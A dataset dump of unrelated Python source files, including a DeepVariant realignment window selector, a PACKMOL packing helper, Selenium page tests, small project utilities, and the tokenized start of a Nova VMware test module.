] | 1 | 2017-12-06T17:30:18.000Z | 2017-12-06T17:30:18.000Z | # Copyright 2017 Google LLC.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Determine genomic ranges to perform local assembly."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from third_party.nucleus.protos import reads_pb2
from third_party.nucleus.util import ranges
from deepvariant.protos import deepvariant_pb2
from deepvariant.protos import realigner_pb2
from deepvariant.python import allelecounter
from deepvariant.realigner.python import window_selector as cpp_window_selector
def _candidates_from_reads(config, ref_reader, reads, region):
  """Returns a list of candidate positions.

  Args:
    config: learning.genomics.deepvariant.realigner.WindowSelectorOptions
      options determining the behavior of this window selector.
    ref_reader: GenomeReference. Indexed reference genome to query bases.
    reads: list[nucleus.protos.Read]. The reads we are processing into
      candidate positions.
    region: nucleus.protos.Range. The region we are processing.

  Returns:
    A list. The elements are reference positions within region.

  Raises:
    ValueError: if config.window_selector_model.model_type isn't a valid enum
      name in realigner_pb2.WindowSelectorModel.ModelType.
  """
  # Count alleles over the region expanded by region_expansion_in_bp, so
  # candidates near the region edges are not missed.
  read_requirements = reads_pb2.ReadRequirements(
      min_mapping_quality=config.min_mapq,
      min_base_quality=config.min_base_quality)
  counter_options = deepvariant_pb2.AlleleCounterOptions(
      read_requirements=read_requirements)

  expanded_region = ranges.expand(
      region,
      config.region_expansion_in_bp,
      contig_map=ranges.contigs_dict(ref_reader.header.contigs))

  counter = allelecounter.AlleleCounter(
      ref_reader.c_reader, expanded_region, counter_options)
  for read in reads:
    counter.add(read)

  # Dispatch on the configured window-selector model.
  model = config.window_selector_model
  if model.model_type == realigner_pb2.WindowSelectorModel.VARIANT_READS:
    return _variant_reads_threshold_selector(
        counter, model.variant_reads_model, region, expanded_region)
  if model.model_type == realigner_pb2.WindowSelectorModel.ALLELE_COUNT_LINEAR:
    return _allele_count_linear_selector(
        counter, model.allele_count_linear_model, region, expanded_region)
  raise ValueError('Unknown enum option "{}" for '
                   'WindowSelectorModel.model_type'
                   .format(config.window_selector_model.model_type))
def _variant_reads_threshold_selector(allele_counter, model_conf, region,
                                      expanded_region):
  """Returns a list of candidate positions.

  A position becomes a candidate when the number of reads supporting a
  variant there falls within the configured [min, max] range of supporting
  reads and the position overlaps the (unexpanded) region.

  Following cigar operations generate candidate position:
    - ALIGNMENT_MATCH, SEQUENCE_MISMATCH, SEQUENCE_MATCH: at mismatch positions
      in the read when compared to the reference sequence.
    - DELETE: at positions within [cigar_start, cigar_start + cigar_len)
    - INSERT, CLIP_SOFT: at positions within
      [cigar_start - cigar_len, cigar_start + cigar_len)

  Args:
    allele_counter: learning.genomics.deepvariant.realigner.AlleleCounter in the
      considered region.
    model_conf: learning.genomics.deepvariant.realigner
      .WindowSelectorOptions.VariantReadsThresholdModel
      options determining the behavior of this window selector.
    region: nucleus.protos.Range. The region we are processing.
    expanded_region: nucleus.protos.Range. The region we are processing.

  Returns:
    A list. The elements are reference positions within region.
  """
  counts_vec = cpp_window_selector.variant_reads_candidates_from_allele_counter(
      allele_counter)

  candidates = []
  for offset, read_count in enumerate(counts_vec):
    pos = expanded_region.start + offset
    if (model_conf.min_num_supporting_reads <= read_count <=
        model_conf.max_num_supporting_reads and
        ranges.position_overlaps(region.reference_name, pos, region)):
      candidates.append(pos)
  return candidates
def _allele_count_linear_selector(allele_counter, model_conf, region,
                                  expanded_region):
  """Returns a list of candidate positions.

  Candidate positions for realignment are generated by scoring each location.
  The score at a location is a weighted sum of the number of reads with each
  CIGAR operation at the location, where the weights are determined by the
  model coefficients. Locations whose score exceeds the model decision
  boundary value are used to create realignment windows.

  Args:
    allele_counter: learning.genomics.deepvariant.realigner.AlleleCounter in the
      considered region.
    model_conf: learning.genomics.deepvariant.realigner
      .WindowSelectorOptions.AlleleCountLinearModel
      options determining the behavior of this window selector.
    region: nucleus.protos.Range. The region we are processing.
    expanded_region: nucleus.protos.Range. The region we are processing.

  Returns:
    A list. The elements are reference positions within region.
  """
  scores_vec = (
      cpp_window_selector.allele_count_linear_candidates_from_allele_counter(
          allele_counter, model_conf))

  candidates = []
  for offset, score in enumerate(scores_vec):
    pos = expanded_region.start + offset
    if score > model_conf.decision_boundary and ranges.position_overlaps(
        region.reference_name, pos, region):
      candidates.append(pos)
  return candidates
def _candidates_to_windows(config, candidate_pos, ref_name):
  """Process candidate positions to determine windows for local assembly.

  Windows are within range of
    [min(pos) - config.min_windows_distance,
     max(pos) + config.min_windows_distance)

  Args:
    config: learning.genomics.deepvariant.realigner.WindowSelectorOptions
      options determining the behavior of this window selector.
    candidate_pos: A list of ref_pos.
    ref_name: Reference name, used in setting the output
      genomics.range.reference_name value.

  Returns:
    A sorted list of nucleus.protos.Range protos for all windows in this
    region.
  """
  distance = config.min_windows_distance

  # Cluster sorted candidate positions first. Two consecutive positions
  # belong to the same cluster when their radius-`distance` windows would
  # overlap or touch, i.e. when they are within 2 * distance of each other.
  clusters = []  # Each element is a mutable [first_pos, last_pos] pair.
  for pos in sorted(candidate_pos):
    if clusters and pos <= clusters[-1][1] + 2 * distance:
      clusters[-1][1] = pos
    else:
      clusters.append([pos, pos])

  # One window per cluster, padded by `distance` on both sides.
  windows = [
      ranges.make_range(ref_name, start - distance, end + distance)
      for start, end in clusters
  ]
  return sorted(windows, key=ranges.as_tuple)
def select_windows(config, ref_reader, reads, region):
  """Process reads to determine candidate windows for local assembly.

  Windows are within range of
    [0 - config.min_windows_distance, ref_len + config.min_windows_distance)

  Args:
    config: learning.genomics.deepvariant.realigner.WindowSelectorOptions
      options determining the behavior of this window selector.
    ref_reader: GenomeReference. Indexed reference genome to query bases.
    reads: A list of genomics.Read records.
    region: nucleus.protos.Range. The region we are processing.

  Returns:
    A list of nucleus.protos.Range protos sorted by their genomic position.
  """
  # Fast path: with no reads there can be no candidates and no windows.
  if not reads:
    return []
  candidate_positions = _candidates_from_reads(config, ref_reader, reads,
                                               region)
  return _candidates_to_windows(config, candidate_positions,
                                region.reference_name)
| 40.141026 | 80 | 0.748749 |
b909e58a149f3245964dec6232a03c9850a25dc4 | 1,371 | py | Python | utils.py | tae898/eliza | 62b4f809b4f854f38b2004759aa4f1e04b95b8e1 | [
"MIT"
] | null | null | null | utils.py | tae898/eliza | 62b4f809b4f854f38b2004759aa4f1e04b95b8e1 | [
"MIT"
] | null | null | null | utils.py | tae898/eliza | 62b4f809b4f854f38b2004759aa4f1e04b95b8e1 | [
"MIT"
] | null | null | null | import time
import jsonpickle
import python_on_whales
import requests
def start_docker_container(
    image: str, port_id: int, sleep_time=5
) -> python_on_whales.Container:
    """Run a detached docker container and wait for it to warm up.

    The container's `port_id` is published to the same port on the host.

    Args
    ----
    image: docker image name
    port_id: port id
    sleep_time: warmup time, in seconds

    Returns
    -------
    container: a docker container object.
    """
    print(f"starting a docker container ... {image}")
    published_ports = [(port_id, port_id)]
    container = python_on_whales.docker.run(
        image=image, detach=True, publish=published_ports
    )
    # Give the containerized service time to come up before returning.
    time.sleep(sleep_time)
    return container
def kill_container(container: python_on_whales.Container) -> None:
    """Kill docker container.

    Sends a kill (forceful stop) to the given container.

    Args
    ----
    container: a docker container object.
    """
    print(f"killing {container} ...")
    container.kill()
def recognize_emotion(utterance: str, url_erc: str = "http://127.0.0.1:10006") -> str:
    """Recognize the speaker emotion of a given utterance.

    The utterance is sent to an ERC (emotion recognition in conversation) API
    server, which returns a mapping from emotion label to score; the label
    with the highest score is returned.

    Args
    ----
    utterance: the text whose speaker emotion should be classified.
    url_erc: the url of the emoberta api server.

    Returns
    -------
    emotion: the most probable emotion label.

    Raises
    ------
    requests.HTTPError: if the API server responds with an error status.
    """
    payload = jsonpickle.encode({"text": utterance})
    response = requests.post(url_erc, json=payload)
    # Fail loudly on a bad HTTP status instead of mis-decoding an error page
    # and returning a bogus "emotion".
    response.raise_for_status()
    scores = jsonpickle.decode(response.text)
    # Pick the label with the highest predicted score.
    emotion = max(scores, key=scores.get)
    return emotion
| 20.462687 | 86 | 0.653538 |
dd0e51ca1d2e1c4d2b9f2fa0e78f3335360803c1 | 6,889 | py | Python | absolv/factories/coordinate.py | SimonBoothroyd/absolv | dedb2b6eb567ec1b627dbe50f36f68e0c32931c4 | [
"MIT"
] | null | null | null | absolv/factories/coordinate.py | SimonBoothroyd/absolv | dedb2b6eb567ec1b627dbe50f36f68e0c32931c4 | [
"MIT"
] | 30 | 2021-11-02T12:47:24.000Z | 2022-03-01T22:00:39.000Z | absolv/factories/coordinate.py | SimonBoothroyd/absolv | dedb2b6eb567ec1b627dbe50f36f68e0c32931c4 | [
"MIT"
] | null | null | null | import errno
import logging
import os
import shutil
import subprocess
from functools import reduce
from typing import List, Tuple
import numpy
from openff.toolkit.topology import Molecule, Topology
from openff.utilities import temporary_cd
from openmm import unit
_logger = logging.getLogger(__name__)
class PACKMOLRuntimeError(RuntimeError):
    """Raised when the PACKMOL executable fails to run or to converge."""
class PACKMOLCoordinateFactory:
"""A factory for generating boxes of molecule coordinates using PACKMOL."""
    @classmethod
    def _approximate_box_size_by_density(
        cls,
        components: List[Tuple[str, int]],
        target_density: unit.Quantity,
        scale_factor: float = 1.1,
    ) -> unit.Quantity:
        """Generate an approximate box size based on the number and molecular weight of
        the molecules present, and a target density for the final system.

        Args:
            components: A list of the form ``components[i] = (smiles_i, count_i)`` where
                ``smiles_i`` is the SMILES representation of component `i` and
                ``count_i`` is the number of corresponding instances of that component
                to create.
            target_density: Target mass density for final system with units compatible
                with g / mL.
                If ``None``, ``box_size`` must be provided.
            scale_factor: The amount to scale the box size by.

        Returns:
            The box size.
        """

        # Parse each distinct SMILES only once, even when it appears in
        # several (smiles, count) entries.
        molecules = {
            smiles: Molecule.from_smiles(smiles)
            for smiles in {smiles for smiles, _ in components}
        }

        volume = 0.0 * unit.angstrom ** 3

        for smiles, count in components:
            # Per-molecule mass: sum of atomic masses (a molar quantity)
            # divided by Avogadro's number. `reduce` is used instead of
            # `sum` because a bare 0 cannot be added to a unit.Quantity.
            molecule_mass = (
                reduce(
                    (lambda x, y: x + y),
                    [atom.mass for atom in molecules[smiles].atoms],
                )
                / unit.AVOGADRO_CONSTANT_NA
            )

            # Volume a single molecule occupies at the target density,
            # multiplied by how many copies of it will be packed.
            molecule_volume = molecule_mass / target_density
            volume += molecule_volume * count

        # Cube root gives the edge length of a cubic box; the scale factor
        # leaves some headroom so PACKMOL can find a packing.
        return volume ** (1.0 / 3.0) * scale_factor
@classmethod
def _build_input_file(
cls,
components: List[Tuple[str, int]],
box_size: unit.Quantity,
tolerance: unit.Quantity,
) -> str:
"""Construct the PACKMOL input file.
Args:
components: A list of tuples containing the file path to an XYZ file and
the number of times to include that component in the final system.
box_size: The size of the box to pack the components into.
tolerance: The PACKMOL convergence tolerance.
Returns:
The string contents of the PACKMOL input file.
"""
box_size = box_size.value_in_unit(unit.angstrom)
tolerance = tolerance.value_in_unit(unit.angstrom)
seed = os.getenv("ABSOLV_PACKMOL_SEED")
return "\n".join(
[
f"tolerance {tolerance:f}",
"filetype xyz",
"output output.xyz",
*([] if seed is None else [f"seed {seed}"]),
"",
*[
f"structure {file_name}\n"
f" number {count}\n"
f" inside box 0. 0. 0. {box_size} {box_size} {box_size}\n"
"end structure\n"
""
for file_name, count in components
],
]
)
@classmethod
def generate(
cls,
components: List[Tuple[str, int]],
target_density: unit.Quantity = 0.95 * unit.grams / unit.milliliters,
tolerance: unit.Quantity = 2.0 * unit.angstrom,
) -> Tuple[Topology, unit.Quantity]:
"""Generate a set of molecule coordinate by using the PACKMOL package.
Args:
components: A list of the form ``components[i] = (smiles_i, count_i)`` where
``smiles_i`` is the SMILES representation of component `i` and
``count_i`` is the number of corresponding instances of that component
to create.
target_density: Target mass density for final system with units compatible
with g / mL.
If ``None``, ``box_size`` must be provided.
tolerance: The minimum spacing between molecules during packing in units
compatible with angstroms.
Raises:
* PACKMOLRuntimeError
Returns:
A topology containing the molecules the coordinates were generated for and
a unit [A] wrapped numpy array of coordinates with shape=(n_atoms, 3).
"""
packmol_path = shutil.which("packmol")
if packmol_path is None:
raise FileNotFoundError(errno.ENOENT, os.strerror(errno.ENOENT), "packmol")
box_size = cls._approximate_box_size_by_density(components, target_density)
molecules = {}
for smiles, _ in components:
if smiles in molecules:
continue
molecule: Molecule = Molecule.from_smiles(smiles)
molecule.generate_conformers(n_conformers=1)
molecule.name = f"component-{len(molecules)}.xyz"
molecules[smiles] = molecule
with temporary_cd():
for molecule in molecules.values():
molecule.to_file(molecule.name, "xyz")
input_file_contents = cls._build_input_file(
[(molecules[smiles].name, count) for smiles, count in components],
box_size,
tolerance,
)
with open("input.txt", "w") as file:
file.write(input_file_contents)
with open("input.txt") as file:
result = subprocess.check_output(
packmol_path, stdin=file, stderr=subprocess.STDOUT
).decode("utf-8")
if not result.find("Success!") > 0:
raise PACKMOLRuntimeError(result)
with open("output.xyz") as file:
output_lines = file.read().splitlines(False)
coordinates = (
numpy.array(
[
[float(coordinate) for coordinate in coordinate_line.split()[1:]]
for coordinate_line in output_lines[2:]
if len(coordinate_line) > 0
]
)
* unit.angstrom
)
# Add a 2 angstrom buffer to help alleviate PBC issues.
box_vectors = numpy.eye(3) * (box_size.value_in_unit(unit.angstrom) + 2.0)
topology = Topology.from_molecules(
[molecules[smiles] for smiles, count in components for _ in range(count)]
)
topology.box_vectors = box_vectors * unit.angstrom
return topology, coordinates
| 33.604878 | 88 | 0.573378 |
e76209f764a4aa77a0bf6171e360d1f6d132e8e7 | 266 | py | Python | nothing/nothing/doctype/nothing_settings/nothing_settings.py | libracore/nothing | e334c5a534eb3ec11ad8c77a467fae05f5383af5 | [
"MIT"
] | 1 | 2022-01-12T11:20:22.000Z | 2022-01-12T11:20:22.000Z | nothing/nothing/doctype/nothing_settings/nothing_settings.py | libracore/nothing | e334c5a534eb3ec11ad8c77a467fae05f5383af5 | [
"MIT"
] | null | null | null | nothing/nothing/doctype/nothing_settings/nothing_settings.py | libracore/nothing | e334c5a534eb3ec11ad8c77a467fae05f5383af5 | [
"MIT"
] | 2 | 2021-05-07T08:01:13.000Z | 2021-08-14T22:24:33.000Z | # -*- coding: utf-8 -*-
# Copyright (c) 2021, libracore AG and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
# import frappe
from frappe.model.document import Document
class NothingSettings(Document):
pass
| 24.181818 | 51 | 0.778195 |
974a75d62b602afb36f86a2e0e116d09f8aa1ba2 | 1,994 | py | Python | test_main_page.py | Espad/stepik_autotests_final_tasks | 2d9e3408766cc00387a8ddd656006556cce567b4 | [
"MIT"
] | null | null | null | test_main_page.py | Espad/stepik_autotests_final_tasks | 2d9e3408766cc00387a8ddd656006556cce567b4 | [
"MIT"
] | null | null | null | test_main_page.py | Espad/stepik_autotests_final_tasks | 2d9e3408766cc00387a8ddd656006556cce567b4 | [
"MIT"
] | null | null | null | import pytest
from .pages.main_page import MainPage
from .pages.login_page import LoginPage
from .pages.basket_page import BasketPage
links = [
"http://selenium1py.pythonanywhere.com/",
# link = "http://selenium1py.pythonanywhere.com/catalogue/the-shellcoders-handbook_209?promo=midsummer"
]
# task 4.3.11
# Группировка тестов: setup
@pytest.mark.login_guest
@pytest.mark.parametrize("link", links)
class TestLoginFromMainPage():
@pytest.fixture(scope="function", autouse=True)
def setup(self, browser, link):
self.link = link
self.browser = browser
def test_guest_can_go_to_login_page(self):
# инициализируем Page Object, передаем в конструктор экземпляр драйвера и url адрес
page = MainPage(self.browser, self.link)
page.open() # открываем страницу
# проверяем, если ли линка на форму логина
page.should_be_login_link()
# выполняем метод страницы — переходим на страницу логина
page.go_to_login_page()
login_page = LoginPage(self.browser, self.browser.current_url)
login_page.should_be_login_page()
def test_guest_should_see_login_link(self):
page = MainPage(self.browser, self.link)
page.open()
page.should_be_login_link()
# task 4.3.10
# Задание: наследование и отрицательные проверки
@pytest.mark.parametrize("link", links)
def test_guest_cant_see_product_in_basket_opened_from_main_page(browser, link):
# инициализируем Page Object, передаем в конструктор экземпляр драйвера и url адрес
page = MainPage(browser, link)
page.open() # открываем страницу
page.should_be_basket_page_link()
page.go_to_basket_page() # переходим в корзину
basket_page = BasketPage(browser, browser.current_url)
# проверяем что есть сообщение о том, что корзина пуста
basket_page.should_be_empty_basket_message()
# проверяем что корзина пуста
basket_page.should_be_empty_basket()
| 37.622642 | 107 | 0.717653 |
ea08e4d8223db78d60009129f5b76b6d511b69d5 | 959 | py | Python | create-graph.py | gerrymandr/sample-graph-data | 9b89f708acd967aa17be8782c182bb63c00c6b29 | [
"CC0-1.0"
] | 4 | 2017-10-24T14:52:44.000Z | 2018-03-16T07:15:13.000Z | create-graph.py | gerrymandr/sample-graph-data | 9b89f708acd967aa17be8782c182bb63c00c6b29 | [
"CC0-1.0"
] | null | null | null | create-graph.py | gerrymandr/sample-graph-data | 9b89f708acd967aa17be8782c182bb63c00c6b29 | [
"CC0-1.0"
] | null | null | null | import networkx as nx
import shapely
import csv
import random
#import an adjacency graph exported from QGIS & create a networkx graph
def read_file(file):
with open(file, 'r') as f:
reader = csv.reader(f, delimiter=',')
reader.next() #skip header
results = [row for row in reader]
return results
def build_graph():
#from the adjacency data, build the graph -- assume each row of CSV is a pair of node IDs which are connected by an edge
#and population data are contained within the 3rd and 4th fields
data = read_file('MN-sample-area/mcd2010-graph.csv')
nodes = set([x[0] for x in data])
edges = [(x[0],x[2]) for x in data if x[2]!='']
G = nx.Graph()
G.add_nodes_from(nodes)
G.add_edges_from(edges)
#link the population data as weights
weights = [(x[3],x[9]) for x in read_file('MN-sample-area/weights.csv')]
for weight in weights:
G.nodes[weight[0]]['weight']=weight[1]
return G
if __name__ == "__main__":
G = build_graph() | 24.589744 | 121 | 0.701773 |
090d03b91140c6be6713db6c01acfb9d99b96339 | 426 | py | Python | crowdhub/settings/local.py | heolin123/crowdagency | 4e892544f7ca49bbac356b73500e77650596d245 | [
"MIT"
] | null | null | null | crowdhub/settings/local.py | heolin123/crowdagency | 4e892544f7ca49bbac356b73500e77650596d245 | [
"MIT"
] | null | null | null | crowdhub/settings/local.py | heolin123/crowdagency | 4e892544f7ca49bbac356b73500e77650596d245 | [
"MIT"
] | null | null | null | from crowdhub.settings.base import *
from crowdhub.settings.auth import *
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'crowdhub',
'USER': 'root',
'PASSWORD': 'password',
'HOST': 'localhost',
}
}
# Setup mongo connection
MONGO_DATABASE_NAME = 'crowdhub_data'
from mongoengine import connect
DEFAULT_CONNECTION_NAME = connect(MONGO_DATABASE_NAME)
| 20.285714 | 54 | 0.659624 |
9e64675fe3ecfa4c96bc82604676d085e2021abf | 2,293 | py | Python | core/models/model_store.py | chenfangchenf/awesome-semantic-segmentation-pytorch | 7fb5718d9c8d606aba520a24655b2f244821b7dc | [
"Apache-2.0"
] | 2,254 | 2019-03-19T12:25:34.000Z | 2022-03-31T07:28:51.000Z | core/models/model_store.py | omarsayed7/awesome-semantic-segmentation-pytorch | 7fbe397a9add570fe1ebee8654898f2b3ba1942f | [
"Apache-2.0"
] | 179 | 2019-03-21T06:00:25.000Z | 2022-03-29T04:02:27.000Z | core/models/model_store.py | omarsayed7/awesome-semantic-segmentation-pytorch | 7fbe397a9add570fe1ebee8654898f2b3ba1942f | [
"Apache-2.0"
] | 552 | 2019-04-23T08:09:56.000Z | 2022-03-29T15:21:29.000Z | """Model store which provides pretrained models."""
from __future__ import print_function
import os
import zipfile
from ..utils.download import download, check_sha1
__all__ = ['get_model_file', 'get_resnet_file']
_model_sha1 = {name: checksum for checksum, name in [
('25c4b50959ef024fcc050213a06b614899f94b3d', 'resnet50'),
('2a57e44de9c853fa015b172309a1ee7e2d0e4e2a', 'resnet101'),
('0d43d698c66aceaa2bc0309f55efdd7ff4b143af', 'resnet152'),
]}
encoding_repo_url = 'https://hangzh.s3.amazonaws.com/'
_url_format = '{repo_url}encoding/models/{file_name}.zip'
def short_hash(name):
if name not in _model_sha1:
raise ValueError('Pretrained model for {name} is not available.'.format(name=name))
return _model_sha1[name][:8]
def get_resnet_file(name, root='~/.torch/models'):
file_name = '{name}-{short_hash}'.format(name=name, short_hash=short_hash(name))
root = os.path.expanduser(root)
file_path = os.path.join(root, file_name + '.pth')
sha1_hash = _model_sha1[name]
if os.path.exists(file_path):
if check_sha1(file_path, sha1_hash):
return file_path
else:
print('Mismatch in the content of model file {} detected.' +
' Downloading again.'.format(file_path))
else:
print('Model file {} is not found. Downloading.'.format(file_path))
if not os.path.exists(root):
os.makedirs(root)
zip_file_path = os.path.join(root, file_name + '.zip')
repo_url = os.environ.get('ENCODING_REPO', encoding_repo_url)
if repo_url[-1] != '/':
repo_url = repo_url + '/'
download(_url_format.format(repo_url=repo_url, file_name=file_name),
path=zip_file_path,
overwrite=True)
with zipfile.ZipFile(zip_file_path) as zf:
zf.extractall(root)
os.remove(zip_file_path)
if check_sha1(file_path, sha1_hash):
return file_path
else:
raise ValueError('Downloaded file has different hash. Please try again.')
def get_model_file(name, root='~/.torch/models'):
root = os.path.expanduser(root)
file_path = os.path.join(root, name + '.pth')
if os.path.exists(file_path):
return file_path
else:
raise ValueError('Model file is not found. Downloading or trainning.')
| 33.231884 | 91 | 0.680331 |
10ffa37b1e3099f05f0dd08e9c4c40835d8ed3df | 576 | py | Python | server/core/errors.py | Neoteroi/BlackSheep-Azure-API | e4a7dae9fd3002fe6926c56a1b2ff65ba851e5cb | [
"MIT"
] | 7 | 2021-12-12T09:14:50.000Z | 2022-02-06T15:59:57.000Z | server/core/errors.py | Neoteroi/BlackSheep-Azure-API | e4a7dae9fd3002fe6926c56a1b2ff65ba851e5cb | [
"MIT"
] | 5 | 2021-12-13T20:27:13.000Z | 2021-12-14T08:31:11.000Z | server/core/errors.py | Neoteroi/BlackSheep-Azure-API | e4a7dae9fd3002fe6926c56a1b2ff65ba851e5cb | [
"MIT"
] | 1 | 2021-12-31T18:52:41.000Z | 2021-12-31T18:52:41.000Z | from typing import Any
from essentials.exceptions import AcceptedException
class ConflictError(Exception):
def __init__(self, message: str) -> None:
super().__init__(message)
class PreconfitionFailed(Exception):
def __init__(
self,
message: str = "The resource has been modified since it was read.",
) -> None:
super().__init__(message)
class AcceptedExceptionWithData(AcceptedException):
def __init__(self, message: str = "Accepted", data: Any = None):
super().__init__(message=message)
self.data = data
| 25.043478 | 75 | 0.682292 |
1f88edcc2d15b945e54fe86a8104cfabdb3e6e01 | 170,718 | py | Python | nova/tests/unit/virt/vmwareapi/test_vm_util.py | bopopescu/nova-token | ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2 | [
"Apache-2.0"
] | null | null | null | nova/tests/unit/virt/vmwareapi/test_vm_util.py | bopopescu/nova-token | ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2 | [
"Apache-2.0"
] | null | null | null | nova/tests/unit/virt/vmwareapi/test_vm_util.py | bopopescu/nova-token | ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2 | [
"Apache-2.0"
] | 2 | 2017-07-20T17:31:34.000Z | 2020-07-24T02:42:19.000Z | begin_unit
comment|'# Copyright (c) 2013 Hewlett-Packard Development Company, L.P.'
nl|'\n'
comment|'# Copyright 2013 Canonical Corp.'
nl|'\n'
comment|'# All Rights Reserved.'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Licensed under the Apache License, Version 2.0 (the "License"); you may'
nl|'\n'
comment|'# not use this file except in compliance with the License. You may obtain'
nl|'\n'
comment|'# a copy of the License at'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# http://www.apache.org/licenses/LICENSE-2.0'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Unless required by applicable law or agreed to in writing, software'
nl|'\n'
comment|'# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT'
nl|'\n'
comment|'# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the'
nl|'\n'
comment|'# License for the specific language governing permissions and limitations'
nl|'\n'
comment|'# under the License.'
nl|'\n'
nl|'\n'
name|'import'
name|'collections'
newline|'\n'
nl|'\n'
name|'import'
name|'mock'
newline|'\n'
name|'from'
name|'oslo_utils'
name|'import'
name|'uuidutils'
newline|'\n'
name|'from'
name|'oslo_vmware'
name|'import'
name|'exceptions'
name|'as'
name|'vexc'
newline|'\n'
name|'from'
name|'oslo_vmware'
op|'.'
name|'objects'
name|'import'
name|'datastore'
name|'as'
name|'ds_obj'
newline|'\n'
name|'from'
name|'oslo_vmware'
name|'import'
name|'pbm'
newline|'\n'
name|'from'
name|'oslo_vmware'
name|'import'
name|'vim_util'
name|'as'
name|'vutil'
newline|'\n'
nl|'\n'
name|'from'
name|'nova'
name|'import'
name|'exception'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'network'
name|'import'
name|'model'
name|'as'
name|'network_model'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'test'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'tests'
op|'.'
name|'unit'
name|'import'
name|'fake_instance'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'tests'
op|'.'
name|'unit'
op|'.'
name|'virt'
op|'.'
name|'vmwareapi'
name|'import'
name|'fake'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'tests'
op|'.'
name|'unit'
op|'.'
name|'virt'
op|'.'
name|'vmwareapi'
name|'import'
name|'stubs'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'virt'
op|'.'
name|'vmwareapi'
name|'import'
name|'constants'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'virt'
op|'.'
name|'vmwareapi'
name|'import'
name|'driver'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'virt'
op|'.'
name|'vmwareapi'
name|'import'
name|'vm_util'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|partialObject
name|'class'
name|'partialObject'
op|'('
name|'object'
op|')'
op|':'
newline|'\n'
DECL|member|__init__
indent|' '
name|'def'
name|'__init__'
op|'('
name|'self'
op|','
name|'path'
op|'='
string|"'fake-path'"
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'path'
op|'='
name|'path'
newline|'\n'
name|'self'
op|'.'
name|'fault'
op|'='
name|'fake'
op|'.'
name|'DataObject'
op|'('
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|VMwareVMUtilTestCase
dedent|''
dedent|''
name|'class'
name|'VMwareVMUtilTestCase'
op|'('
name|'test'
op|'.'
name|'NoDBTestCase'
op|')'
op|':'
newline|'\n'
DECL|member|setUp
indent|' '
name|'def'
name|'setUp'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'super'
op|'('
name|'VMwareVMUtilTestCase'
op|','
name|'self'
op|')'
op|'.'
name|'setUp'
op|'('
op|')'
newline|'\n'
name|'fake'
op|'.'
name|'reset'
op|'('
op|')'
newline|'\n'
name|'stubs'
op|'.'
name|'set_stubs'
op|'('
name|'self'
op|')'
newline|'\n'
name|'vm_util'
op|'.'
name|'vm_refs_cache_reset'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_instance'
op|'='
name|'fake_instance'
op|'.'
name|'fake_instance_obj'
op|'('
nl|'\n'
name|'None'
op|','
nl|'\n'
op|'**'
op|'{'
string|"'id'"
op|':'
number|'7'
op|','
string|"'name'"
op|':'
string|"'fake!'"
op|','
nl|'\n'
string|"'display_name'"
op|':'
string|"'fake-display-name'"
op|','
nl|'\n'
string|"'uuid'"
op|':'
name|'uuidutils'
op|'.'
name|'generate_uuid'
op|'('
op|')'
op|','
nl|'\n'
string|"'vcpus'"
op|':'
number|'2'
op|','
string|"'memory_mb'"
op|':'
number|'2048'
op|'}'
op|')'
newline|'\n'
nl|'\n'
DECL|member|_test_get_stats_from_cluster
dedent|''
name|'def'
name|'_test_get_stats_from_cluster'
op|'('
name|'self'
op|','
name|'connection_state'
op|'='
string|'"connected"'
op|','
nl|'\n'
name|'maintenance_mode'
op|'='
name|'False'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ManagedObjectRefs'
op|'='
op|'['
name|'fake'
op|'.'
name|'ManagedObjectReference'
op|'('
string|'"host1"'
op|','
nl|'\n'
string|'"HostSystem"'
op|')'
op|','
nl|'\n'
name|'fake'
op|'.'
name|'ManagedObjectReference'
op|'('
string|'"host2"'
op|','
nl|'\n'
